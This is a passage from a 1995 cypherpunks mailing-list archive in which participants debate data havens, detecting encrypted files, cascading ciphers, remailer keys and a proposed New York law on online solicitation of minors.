then Bob, and same with Bob.  I'm not sure how this changes things, if at
all.
2) In real life, it's more likely for an attacker to want to discover Alice
knowing Bob then it is for him to want to discover Bob knowning Alice.
It's Alice who is being anonymous here by using the anonymous RemailerNet,
of course. I don't think this changes things either, but it's something to
keep in mind.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:05:56 PST
To: cypherpunks@toad.com
Subject: Re: Reefer madness
Message-ID: <ab3b202302021004413b@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:35 AM 01/12/95, Russell Nelson wrote:
>misdemeanor.  I spoke to Bob Penna, the legislative aide who
>researched and wrote up the bill for Bill Sears.  He realizes that the
>Internet cannot reasonably be censored, and that the solution is to be
>able to punish people who do it (hence the felony) and to educate

I dont' find that particularly reassuring. "being able to punish people who
do it," is ultimately going to have to consist of preventing non-GAK
encryption, in the minds of the Gubmint.  You can't punish them if you
can't catch them, and you can't catch them if they use strong encryption.


Well, in reality you still can catch them,  after all no one can sexually
assault anyone over the internet (yet, anyway).  Sometime they've got to do
something in person, and there's no encryption in a physical meeting, where
everyone sees your TrueFace.  But I'm not sure how much I trust the gubmint
types to take this all into account, instead of just abolishing crypto on
the typical four horsemen platform.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Thu, 12 Jan 95 10:05:39 PST
To: cypherpunks@toad.com
Subject: Re: Purpose of Data Havens
Message-ID: <199501121810.NAA25089@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hal writes:
> The idea of offsite storage doesn't seem that helpful since you can just
> store the data on your own disk in encrypted form.  Maybe if encryption
> gets outlawed it would be useful, but then you can't use encryption to
> communicate with the haven.

As Eric notes elsewhere, off-site backups are useful in general in case some
physical calamity strikes your site. It seems to me that a data haven 
addresses a more aggressive threat model than this. Rather than just worrying
about the act of a hacker / nature / etc. eradicating our local copies of
data (encrypted or not), we're concerned about intelligent agents (human or
electronic) attempting to commit genocide on all instances of some data we
possess. 

Scenario: June is a test engineer at Rockwell Intl. At the lab where she works,
it is observed that some rubber O-rings being designed for the space shuttle
are liable to crack, and lose their airtight seal, when exposed to the 
extremely low temperatures of space. The project is behind, so the researchers
are instructed to proceed in spite of the problem. June encrypts the test
results and deposits them in a data haven. Then she calls her boss's boss and
offers a deal (whitemail ?). Either the part is redesigned, or she'll present
the incriminating evidence to the New York Times. Even if Rockwell sends some
goons to June's apartment while she's at work the next day, to reduce her 
laptop to solder, she still has the means to carry out her threat.

"Rikki don't lose that number - send it off in a letter to yourself"-Steely Dan

 -L. Futplex McCarthy
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxVwgSoZzwIn1bdtAQF0vwGAuLRLR9PVcj9Q8NCqNDvRf4bC5zUA4A/U
m/9tT74hoQNEBNEzw1TqZTr0ZxHtciwd
=uXUO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 12 Jan 95 10:13:28 PST
To: assets@alpha.c2.org (Offshore Assets)
Subject: Re: Chain
In-Reply-To: <199501121752.JAA10878@infinity.c2.org>
Message-ID: <9501121813.AA14895@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Is there a way for me in PGP to edit and update the information contained
> in the public keys of others?
> I would want to add an "also known as" line for 'Chain' to spot.

Sure, pgp -ke will do that for you..  Its just that the new ID will
not be certified, and PGP will consider the key invalid as far as
trust goes..

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:13:52 PST
To: Nesta Stubbs <cypherpunks@toad.com>
Subject: Re: Data Havens..A consumer perspective
Message-ID: <ab3b21760302100490ca@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:30 AM 01/12/95, Nesta Stubbs wrote:
>> 4. It is no concern (only idle curiosity maybe) where the data is parked.
>
>it matters alot too me, that's the security of the dat, what if your data
>is sem top secret plan to bomb the pentagon, and you are using the data
>haven to distibute to your band of anonymous terrorists, I am sure you
>woudln't want your data stored ona  public access Unix system, or in
>plaintext.

You shouldn't ever give the operator the info in plaintext. Encrypt it,
public or otherwise, and distribute the key to your Band of Merry Men.
Then it doesn't matter even it's sitting on a public access Unix system, no
one can read it anyhow.  The main point of this kind of data haven seems to
be providing you a remote location to store your data, in an anonymous way,
so even if it does end up being found out, you can't be linked to it.  I
wouldn't trust the operator to do anything particular with the data other
then keep it safe enough so I can retrieve it later, and I'd take the
neccesary precautions to account for that lack of trust. The only reason
I'd trust him to even keep it safe for me, is because of reputation market.
If he routinely loses people's data, word is going to get around. On the
other hand, if he routinely shows people's data to the FBI, no one is even
going to know about it. I don't trust him not to routinely show the data to
the FBI, or store it in public.  Use encryption.

Of course there are different purposes for data havens, which would require
more trust of the operator.  But I'm not sure how well those are ever going
to work, because I'd much rather trust my encryption then trust the
operator.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Thu, 12 Jan 95 19:49:56 PST
To: cactus@hks.net (L. Todd Masco)
Subject: Re: Crypto functions
In-Reply-To: <199501102139.QAA00961@bb.hks.net>
Message-ID: <9501122119.AA05796@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> What crypto functions are considered modern and usable?  The list I have
> right now is:
> 
> RSA
> IDEA
> DES
> 3DES
> RC4
> RC5
> BLOWFISH
> MD4
> MD5
> 
> (and FLAMINGO, a trivial test case, which consists of xor'ing every 8 chars
>  with "flamingo".)
> 
> Pointers to code for any other schemes will be greatly appreciated.

You might want to include LUC, even though it is fairly new and
extremely cumbersome to implement (though, I would say, not outright
unusable).

Among symmetric ciphers, there's GOST.

And I'd count SHA as a reliable hash function.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:19:31 PST
To: Hal <cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <ab3b236e040210040733@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 01/12/95, Hal wrote:
>The idea of offsite storage doesn't seem that helpful since you can just
>store the data on your own disk in encrypted form.  Maybe if encryption
>gets outlawed it would be useful, but then you can't use encryption to
>communicate with the haven.

Hmm. I post through a long anonymous remailer chain to an appropriate newsgroup:
"I have made an archive of state secrets (or trade secrets, for that
matter, or pornography), available on data haven Wherever. Ask to receieve
the following file for a list of contents."

Seems it could be useful. Especially if you had some way of extracting
digicash payment from it, in an anonymous way.  But even if you didn't,
perhaps you want to make this info available as a public service. I sure as
heck wouldn't want it sitting on a hard drive in my bedroom.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 12 Jan 95 10:35:55 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: Reefer madness
In-Reply-To: <ab3b202302021004413b@[132.162.201.201]>
Message-ID: <m0rSUVJ-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   Date: Thu, 12 Jan 1995 13:10:08 -0500
   From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)

   At 9:35 AM 01/12/95, Russell Nelson wrote:
   >misdemeanor.  I spoke to Bob Penna, the legislative aide who
   >researched and wrote up the bill for Bill Sears.  He realizes that the
   >Internet cannot reasonably be censored, and that the solution is to be
   >able to punish people who do it (hence the felony) and to educate

   Well, in reality you still can catch them,  after all no one can sexually
   assault anyone over the internet (yet, anyway).

Mmmm, being the parent of two children, I have to disagree.  The brain
is the primary sexual organ, after all.

   Sometime they've got to do something in person, and there's no
   encryption in a physical meeting, where everyone sees your
   TrueFace.  But I'm not sure how much I trust the gubmint types to
   take this all into account, instead of just abolishing crypto on
   the typical four horsemen platform.

Hey, I don't trust the gubmint either, that's why I called Bob to get
an explanation.  I really *don't* think that New York State plans to
ban encryption, not now and not over this issue anyway.  His thrust is
1) to have the legal authority to sufficiently punish someone who goes
after children (which they don't have now), and 2) to educate guardians
about the risks of untoward communications from adults to children.

- -- 
- -russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAwUBLxV4bKbBSWSDlCdBAQETDgQAjTHvEkdBxIHvHFOWZjZwCy0V1EIVkImc
t0HcB1Zwm6YdHpHNHl8EZbFn7EVIR3ctv17Y52YhS8Ilsdux0m8dFPCmVIWEGVDT
pcZWFL3a4SB+pOcCeAL3frqhYS6+wACEfJbMgHPKv3QLwiej905GpC0qM1uwkX4x
D75Pf20F/nY=
=xHOc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 12 Jan 95 14:28:47 PST
To: sandfort@crl.com
Subject: Re: Reefer madness
Message-ID: <9501122229.AA13951@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Sandy Sandfort

Ever seen a Turkish prison film, Reuben?
.........................................................

I don't get it.   (I haven't seen one)

Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brendan McKenna" <brendan@moe.oc3s-emh1.army.mil>
Date: Thu, 12 Jan 95 05:22:32 PST
To: cypherpunks@toad.com
Subject: Cryptanalysis
Message-ID: <9501121322.AA22913@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

	I light of recent threads about recognising whether or not a given 
message/file is encrypted, and using CBW and things along those lines, is there
any way to determine how something was encrypted?  For example, I know that
a statistical analysis of the cyphertext will uncover simple substitution
cyphers fairly quickly.  Does the same sort of analysis apply to determining
whether something was encrypted using IDEA or DES or RSA?  I realize that they
attempt to maximize the entropy of the cyphertext -- perhaps there is some
characteristic amount or range of amounts of entropy associated with these
cyphers?  Not every package is as nice as PGP in labeling everything it
encrypts with headers...   Any pointers would be greatly appreciated....


						Brendan

PS.  What I'd like to be able to do is take a given chunk of cyphertext and
     analyze it and say: "There is an x% probability that this was encrypted
     using method y...."  Hopefully I'd have a reasonable chance of recognizing
     how it was encrypted, and not all of the percentages would be so low as
     to make the exercise meaningless.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 12 Jan 95 06:26:18 PST
To: brendan@moe.oc3s-emh1.army.mil
Subject: Re: Cryptanalysis
Message-ID: <9501121425.AA03332@pero>
MIME-Version: 1.0
Content-Type: text/plain


> 	I light of recent threads about recognising whether or not a given 
> message/file is encrypted, and using CBW and things along those lines, is there
> any way to determine how something was encrypted?  For example, I know that
> a statistical analysis of the cyphertext will uncover simple substitution
> cyphers fairly quickly.  Does the same sort of analysis apply to determining
> whether something was encrypted using IDEA or DES or RSA?  I realize that they
> attempt to maximize the entropy of the cyphertext -- perhaps there is some
> characteristic amount or range of amounts of entropy associated with these
> cyphers?  Not every package is as nice as PGP in labeling everything it
> encrypts with headers...   Any pointers would be greatly appreciated....

If the encryption method is any good, the output will be pseudo-random
with no digit being more frequent than any other. This certainly applies
to IDEA and DES. With RSA, you usually have a random (IDEA) session key
encrypted using the senders private key. This will also be an effectively
'random' number.

> PS.  What I'd like to be able to do is take a given chunk of cyphertext and
>      analyze it and say: "There is an x% probability that this was encrypted
>      using method y...."  Hopefully I'd have a reasonable chance of recognizing
>      how it was encrypted, and not all of the percentages would be so low as
>      to make the exercise meaningless.

This would only work for ciphers that are effectively 'broken'. Also, many
packages and users compress data before encryption. Compression algorithms
work by removing patterns from data, so the resultant compressed plaintext
becomes fairly random anyway, removing the utility of frequency analysis.

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Thu, 12 Jan 95 14:34:47 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501122233.OAA02325@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>You don't always need the correct answer.  You just need the correct
>answer most of the time.  You're trying to create a presumption about
>behavior.  Ensuring that you can't read almost all of the traffic is a
>pretty good way to assure people that you don't try to make sense of
>any of it.


I'm still not making my point.  Encryption is not a data 'state' that can 
be tested for in the way that liquid/solid/vapour are states 
of matter.  Encryption is a data 'interpretation' for which there are an 
arbitrairly large number of interpretations available for any 
given dataset. There is no algorithmic test that can applied to a dataset 
that will be able to establish the existance or non-existance 
of a given interpretation.  If you're given an unkown dataset and are 
asked the question, 'Is this an image file' or 'Is this an encrypted 
file' or 'Is this an audio clip', there is no algorithmic test that can 
answer any of these questions in either the affermative or the negative. 
 This is just an alternate phrasing of Goedel's Undecidability Theorem.  
This problem lies permanantly outside the outer boundary of algorithmic 
capability.

Let me now spin a little tale as to how this affects an operator of a 
re-mailer or datahaven.  This tale has two characters, Paco the child 
pornogropher and Eric the honest RM/DH operater.  Paco begins by 
inventing the new 'Foolproof Barometric Graphic Image Format' (aka FooBar 
GIF) of which only Paco knows the internals.  A FooBar GIF has a 
statistical profile that looks remarkably like a PGP file, in fact it 
even comes with a PGP header!  Nothing illegal here.  Now Paco writes a 
FooBar GIF Viewer which he sales to child-porn types. Again, there's 
nothing illegal about the sale of such a piece of software.  Paco now 
anonymously loads Eric's DH with lots of child-porn FooBar GIF's via 
Eric's anon-RM.  These files of course sail right through Eric's filters 
with nary a scratch.  As far as Eric knows he's holding PGP encrypt 
files.  Now Paco advertises the availability of lots of 'good' picture on 
Eric's DH that can be used with the newly purchased FooBar GIF Viewers.  

Then the cops get ahold of one of Paco's FooBar GIF Viewers and downloads 
some FooBar GIFs from Eric's DH and the last words we ever hear from Eric 
are "I swear I thought they were PGP files, I swear to God I thought they 
were....." as the authorities drag his carcass off to jail.  Whose going 
to believe Eric's protests of innocence?  "After all", says the 
prosecutor to the jury, "wasn't Eric explicitly filtering out what he 
didn't want in. If fact", says the prosecutor, "his filter seems to have 
been designed specifically to allow these kiddie-porn files in and to 
reject all others."  A sad end indeed!

Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 14:54:26 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501121701.JAA24309@jobe.shell.portal.com>
Message-ID: <199501122252.OAA01584@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Hal <hfinney@shell.portal.com>

   The idea of offsite storage doesn't seem that helpful since you can just
   store the data on your own disk in encrypted form.  

I'll tell you one really useful facility for offsite storage, and
that's private key backup.  Use a secret sharing arrangement, say 5
out of 7 reconstruction, and send out 7 chunks.  Now, give a different
pointer-to-chunk to each of 7 different people.  In the case of
catastrophe, you can recover your key.

Too paranoid not to let your key out of your sight?  Then don't do
this.

Here's another use.  I'd like to interlock offsite backup with my
digital money withdrawals, so that my money is always backed up.

Let's be clear; the code that dfloyd@io.com is working on is offsite
storage in a reasonably secure form.  It's not a data haven.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Thu, 12 Jan 95 11:48:08 PST
To: cypherpunks@toad.com
Subject: Re: Chain and Shifting Remailer Addresses
Message-ID: <199501121953.OAA26211@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Offshore Assets writes:
> I use Hal Finney's 'Chain' a lot:

Uh, I think you probably mean Lance Cottrell, not Hal -- unless Hal's also
written a similar utility with an identical name, about which I haven't heard.

> [...] But it won't PGP correctly with the Usura
> and the Flame remailers because these two have e-mail addresses that 
> have changed and/or are different from the addresses specified in their
> public keys (Usura, for instance, is now <usura@replay.com>, but this 
> is not the address given in its public key ID). 

Alex de Joode posted a copy of the usura key edited to reflect the domain name
change to alt.privacy.anon-server. It's presumably on the keyservers....

Oh, and the flame remailer passed away with the closure of the jpunix remailer,
as far as I can tell. (I vaguely recall something to the effect that sinet.org
is/was registered as a subdomain of jpunix.com, but I might well be wrong.)

Hope this helps.

 -L. Futplex McCarthy


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxWIfyoZzwIn1bdtAQHcYwF/alAsviWQvyzf4Qg1JR+G0l1sP3o6AGZN
xvaxIZsKhhX03RNogflWZPBah3y8DnCa
=aVDR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fhalper@pilot.njin.net (Frederic Halper)
Date: Thu, 12 Jan 95 12:20:02 PST
To: mark@unicorn.com
Subject: Re: Reefer madness
Message-ID: <9501122019.AA14798@pilot.njin.net>
MIME-Version: 1.0
Content-Type: text/plain


mark@unicorn.com wrote:

But what happens if, say, a minor is solicited for sex when they are
pretending to be older than they are ? Or if the solicitation comes via a
remailer ?  Or a minor with a grudge fakes email to show that someone
attempted to get them to agree to sex/picture-taking or whatever ?

Once you pass laws making some forms of communication illegal, you're
immediately getting into dodgy territory requiring is-a-person
credentials and so on. That isn't neccesarily a problem if it's voluntary
(e.g. your kids accounts might be set up to only accept mail from people
who're certified to be under 18 or whatever), but governments are
unlikely to do things that way.

Any person no matter their age should be wary if someone solicits them for sex.
I'm 16 years old and have been on the Internet for a little more than a year and
I haven't nor have I met anyone who has been approached by a pedophile.  The 
examples used are isolated incidents, which could have likely been prevented had
they discussed it with their parents or tried to obtain more info about the 
person they were going to meet.
-RH

---------------------------------------------------------------------------------
Reuben Halper                          I'm not growing up, I'm just burnin' out."
Montclair High                                          - Green Day -
Montclair, NJ
E-mail: fhalper@pilot.njin.net                    PGP 2.6ui Public Key
                                                  available upon request
---------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 12 Jan 95 13:03:28 PST
To: Censored Girls Anonymous <carolb@barton.spring.com>
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
Message-ID: <Pine.SUN.3.91.950112154736.27697D-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Censored Girls Anonymous wrote:

> Date: Thu, 12 Jan 1995 02:32:06 -0600 (CST)
> From: Censored Girls Anonymous <carolb@barton.spring.com>
> To: cypherpunks@toad.com
> Subject: Data Havens..A consumer perspective
> 
> 
> 1. You have what I want or need.

As far as what...?  Data already in the haven?  Storage capacity?  Speed 
of link?

> 2. In order for me to let you store it, I will give it to you
>    anyway you wish to get it.

Does this include on old style magnetic reel to reel?  Clearly there has 
to be some simplicity of submission.  I would further submit than many 
"consumers" will not want to store plaintext data, and thus "any way you 
wish to get it." quickly becomes unacceptable.

> 3. I will let you do anything to the data you wish, so long as I  
>    get it back intact.

Again, does this include storing it in a /pub/ dir on an ftp site in 
plaintext?  No, there must be a clear stated policy of the site 
operator's method of storage.

> 4. It is no concern (only idle curiosity maybe) where the data is parked.

This ignores jurisdictional concerns that may have significant, even 
severe impact.

> 5. I would expect to pay money for the safekeeping of my data.

What kind of money?  Digital postage?  New currency?  DM? $?
This toois s is a simplistic representation of the real concern.

> 6. I would expect the longer you hold the data, the more it will cost.

I assume you mean day to day cost, not rates by data age?
Though this brings up a interesting point, what would be the incentives 
served and created by charging on a phase in scale?  i.e., what would be 
the result if a DH were to charge $ .05 a day for data that had been in 
the DH for over a month, and $ .09 a day for data over a year?  It would 
at the very least, increase traffic as old data was taken out and put 
back in to avoid the steped up "latency" charge.  If all the data was 
encrypted, would this help deter traffic analysis by imposing 
"productless" transactions resulting in no net change in the DH's holdings?

Hmmmmm.

> 7. The only thing I am counting on is the data's timely retrieval.

And not its ability to be directed to specific parties, rather than the 
public at large?  And not its ability to avoid traffic analysis?  And not 
its ability to be multi or non-jurisdictonal?

> 8. Welcome to the world of data "coatchecking".

I've lost several coats this way.

> Why make it more complex than this?

Why insist on this simplicity.  Why not store it on your own machine if 
these are your only requirements?

> From the moment the data leaves their hands, until I return it,
> they have no right, nor I no obligation, to divulge anything about it.
> For they already would know, it would take a few minutes to retrieve it.

This was to be from a consumers's prespective I thought.  In any event, 
this ignores the possibility of court ordered disclosure, availability to 
third and fourth parties, and traffic analysis concerns.

> For whether it's encrypted to the nth degree, or parked in a plain brown
> wrapper in a massive unix box somewhere, as long as I the haven manager,
> return the data in a safe, timely, uncorrupted manner, I've done my duty.

What you are talking about has little if anything to do with "Data 
Havens" you're just selling storage space.

> Carol Anne


073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pdlamb@iquest.com (Patrick Lamb)
Date: Thu, 12 Jan 95 14:32:59 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <199501122232.QAA04830@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


>In article <199501120502.VAA29808@largo.remailer.net>,
>Eric Hughes <eric@remailer.net> wrote:
>>   From: cactus@seabsd.hks.net (L. Todd Masco)
(bunch of stuff deleted)

>>   I guess this reduces to: do strong cyphers have "signatures" of some sort,
>>   by which the type of encryption can be derived? 
>>
>>If they do, they're likely not _strong_ ciphers.
>
>Great... that's the answer I was looking for, and what my gut feeling
>was.  I'm trying to determine how much rope is too much for a first pass.
>
>Related: is there, in general or in any known specific cases, any loss of
>security in using sym. cipher A on ciphertext B (of another sym. cipher) with
>the same key?  With different keys (I would think not, but I vaguely
>remember mention of something here long ago)?

Is this asking the question, "Does DES form a group with IDEA?"  (Substitute
your favorite cipher.)  Since it took about 15 years to figure out DES is
_not_ a group, I suspect it will take a long time to figure out the answer
to that question for each pair of ciphers you're going to substitute.

Seems to me it's a good basic idea.  If it costs, for example, a million
bucks to crack a cipher; you have three ciphers that can be used; then the
best-case cost to crack a message just tripled!  Of course, if you choose
two ciphers stronger than DES, it probably went up a little more (g).

If the ciphers don't form a group, you just made your system unbreakable.
Just use two ciphers.  Then a brute-force attacker has to check each key for
each cipher once when it is applied first, and once for each of the possible
keys for the other cipher when it is applied second!

Sounds too good to be true.  Am I missing something?

        Pat





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Thu, 12 Jan 95 17:11:04 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: FBI and BLACKNET
In-Reply-To: <WO55lKjqRey2077yn@mirage.skypoint.com>
Message-ID: <Pine.HPP.3.91.950112170758.18085D-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 11 Jan 1995, Samuel Kaplin wrote:

> I hope they took you someplace nice for lunch...You might want to file a
> FOI request on yourself, just to see how much they censor. ;) They might
> think you're the ringleader, after all the FBI doesn't buy peons lunch. ;)
> 

For the benifit of myself and the list, how would you go about doing that?


> Sam
> skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
> E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
> Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
>             A man wrapped up in himself makes a very small package.

--Syed




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grmorgan@freenet.vcu.edu (Greg Morgan)
Date: Thu, 12 Jan 95 14:46:08 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <9501122245.AA18097@freenet.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain




>
>> But selecting a single cipher is just as much a fixed policy as a
>> randomly selected one is.  Far better to let the user pick a policy,
>> both about sent and accepted ciphers.
>
>If you do give the user control, what is an acceptable mechanical
>implementation? Let's say I have a file encryptor which allows the
>user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I
>require the user to tell that program what cypher was used to encrypt
>the file she wishes to decrypt?
>
>Is storing the cypher type as part of the encrypted file a weakness?

Perhaps an MD5 of the password could be encrypted along with the
plaintext using the method(s) of choice.  At the decryption
phase, the password would be MD5 hashed again and the block of
bytes the size of an MD5 hash would be "decrypted" with each of
the methods... which ever one matches the original MD5 hash
would be used to decrypt the rest of the cyphertext.

This method wouldn't leave a known plaintext in the file to
attack.

--
-----------------------------------------------------------------------------

Greg Morgan <grmorgan@freenet.vcu.edu> | "I dunno Brain, me and
Pipi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Thu, 12 Jan 95 14:48:31 PST
Subject: Re: Reefer madness
In-Reply-To: <9501122229.AA13951@netmail2.microsoft.com>
Message-ID: <Pine.3.89.9501121721.A25153-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



Who are the big public key registeries out there now? just got a call 
that the USPS is developing its own public key registry. Is this news to 
you guys?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Feuer <adamfast@seanet.com>
Date: Thu, 12 Jan 95 18:15:04 PST
To: cypherpunks@toad.com
Subject: essential characteristics of a Data Haven
Message-ID: <Pine.NXT.3.91.950112180625.3304B-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


folks,

  looking thru the cyphernomicon, this is about all i could come up with
for characteristics of a data haven:

|16.22. Data Havens
|  16.22.1. "What are data havens?"
|           + Places where data can be hidden or protected against legal
|              action.
|             - Sterling, "Islands in the Net," 1988


  anyone have a list of the essential characteristics of a data haven?
what differentiates a "data haven" from "reasonably secure offsite
storage"?

here's my attempt at a working definition:


a "data haven"...

1. "securely" stores data files for remote users.
2. will only allow "authorized" entities to store files in the data haven.
3. will only allow "owners" of the files to withdraw their files from the 
      data haven. 
4. differentiates "authorized" entities from "non-authorized ones, and 
      "owners" from "non-owners", only by means of cryptographic keys.

  terms i left undefined are "securely," authorized," and "owner." by
"secure" i imagine a DH will attempt to prevent its data from being
destroyed, or read by anyone other than the data's "owner." by
"authorized" i imagine that a DH will not want to accept data from
just anyone. (for instance, people who don't pay.) by "owner" i mean
the specific "authorized" entity that stored the data in the DH.

  i imagine that most DH's will need to accept digital cash to be able
to operate. is this an essential characteristic of a cp data haven?
what did i leave out?

adam

adamfast@seanet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Thu, 12 Jan 95 17:17:50 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110100ab3b6fb73f29@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


Here's a solution:

Alice sends a file to Dave's DataHaven. When Alice wants her file back, she
sends to Dave a secure hash of the file, a key with which to decrypt it,
and a handful of plaintext at the beginning of the file. Dave decrypts the
file that matches the hash with the key Alice gave him; if the file begins
as Alice says it should, Dave returns the file to Alice.

This way, only those people who have an intimate knowledge of the files can
recover them.

The hash isn't vital; Dave could try to decrypt each file on the server
with the key Alice gives him until he matches the plaintext--but that's
neither elegant nor friendly to the CPU.

People can send Dave whatever kind of file they like, but they'll only get
it back if it's been encrypted properly. If Dave charges to store a file,
he'll gladly welcome as much spammage as people want to send him. If he
likewise charges to return a file, he'll just as glady send a file to
whoever gives him the cash and can identify it.

Dave can have a policy whereby he deletes a file after returning it, unless
Alice pays more to keep it there. Thus, Bad Bobby can send his naughty
pictures to Dave, tell the 'net how to get them--but the first person who
neglects to include the fee to leave the pictures there winds up blocking
out everybody else. Similarly, Samaritan Sam could get into a spending war
with Bobby. Each time Bobby sends Dave his smut, Sam retrieves the file
without paying for its continued storage--and takes a sneak peak at the
pictures before deleting them himself.

Dave has no way of knowing what people are storing on his machine until the
owner asks for the file back, and so cannot be held liable for the storage
of "undesirable" files. Mallet could seize the entire archive and have
nothing useful. Eve could recover information leaving the haven, but
presumably Alice will further encrypt her files however she chooses. Or, as
a service, Dave could agree to encrypt the file with an assymetric cipher
before returning it.

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 12 Jan 95 15:30:08 PST
To: NetSurfer <cypherpunks@toad.com
Subject: Re: Microsoft TrueName (tm) (fwd)
Message-ID: <v01510104ab3b6305a759@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 AM 1/12/95, NetSurfer wrote:

>I wondered why one of the few registered hosts for Microsoft were called
>"Bob" - now it makes sense.  (But they've got a good sized chunk of
>netblks registered...)

Funny thing happened to me last night. I was talking to a guy who had seen
